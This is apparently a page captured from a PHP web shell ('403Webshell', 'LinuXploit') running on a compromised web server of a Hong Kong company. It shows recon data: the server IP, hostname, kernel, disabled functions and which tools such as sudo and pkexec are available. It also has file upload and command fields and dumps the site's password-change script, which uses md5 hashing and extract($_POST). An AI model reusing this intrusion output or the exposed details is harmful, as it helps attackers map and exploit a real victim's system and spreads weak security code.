403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/onesupportsys.onesolution.hk/user/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/onesupportsys.onesolution.hk/user//passwordmodify.php
<?php
require_once(__DIR__ . '/../checkuser.php');
if (isPost()) {
	extract($_POST);
	if (isset($id, $loginpw, $loginpw2)) {
		// Validation
		$errors = array();
		if ($loginpw != $loginpw2) {
			$errors['loginpw'] = 'Password and Re-enter password are not match.';
		}
		if ($id != $_SESSION['webadmin']['id']) {
			$errors['id'] = 'Not allow to modify other user password.';
		}
		if (!empty($errors)) {
			$message = print_r($errors, true);
		} else {
			$sql = "SELECT column_name FROM information_schema.columns WHERE table_schema = (SELECT DATABASE()) AND table_name = ?";
			$parameters = array('sys_login');
			if (!($sth = $dbh->prepare($sql))) {
				throw new Exception("sql prepare statement failure: $sql");
			}
			$sth->setFetchMode(PDO::FETCH_ASSOC);
			if (!$sth->execute($parameters)) {
				throw new Exception("sql execute statement failure: $sql");
			}
			$columns = $sth->fetchAll();

			$post = $_POST;
			foreach ($columns as $column) {
				$column = $column['column_name'];
				if (isset($post[$column])) {
					$staff[$column] = $post[$column];
				}
			}
			
			// Append record time
			$now = date("Y-m-d H:i:s");
			$staff = array_merge($staff, array(
				'lastupdate' => $now,
				'lastupby' => $_SESSION['webadmin']['id'],
			));
			
			// Update staff
			$values = array();
			$parameters = array();
			foreach ($staff as $column => $value) {
				if ($column != 'id') {
					switch ($column) {
						case 'loginpw':
							$parameters[] = md5($value);
							break;
						default:
							$parameters[] = !strlen($value) ? null : $value;
							break;
					}
					$values[] = "`$column` = ?";
				}
			}
			$sql = "UPDATE sys_login SET " . implode(', ', $values) . " WHERE id = ?";
			$parameters[] = $staff['id'];
			if (!($sth = $dbh->prepare($sql))) {
				throw new Exception("sql prepare statement failure: $sql");
			}
			$sth->setFetchMode(PDO::FETCH_ASSOC);
			if (!$sth->execute($parameters)) {
				throw new Exception("sql execute statement failure: $sql");
			}
			
			$data = array(
				'message' => 'Password changed, please sign in again.',
				'message_heading' => 'Notice',
				'message_css_class' => 'alert-success',
			);
			redirectAndExit(Util::link(__DIR__ . '/../logout.php') . '?' . http_build_query($data));
		}
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit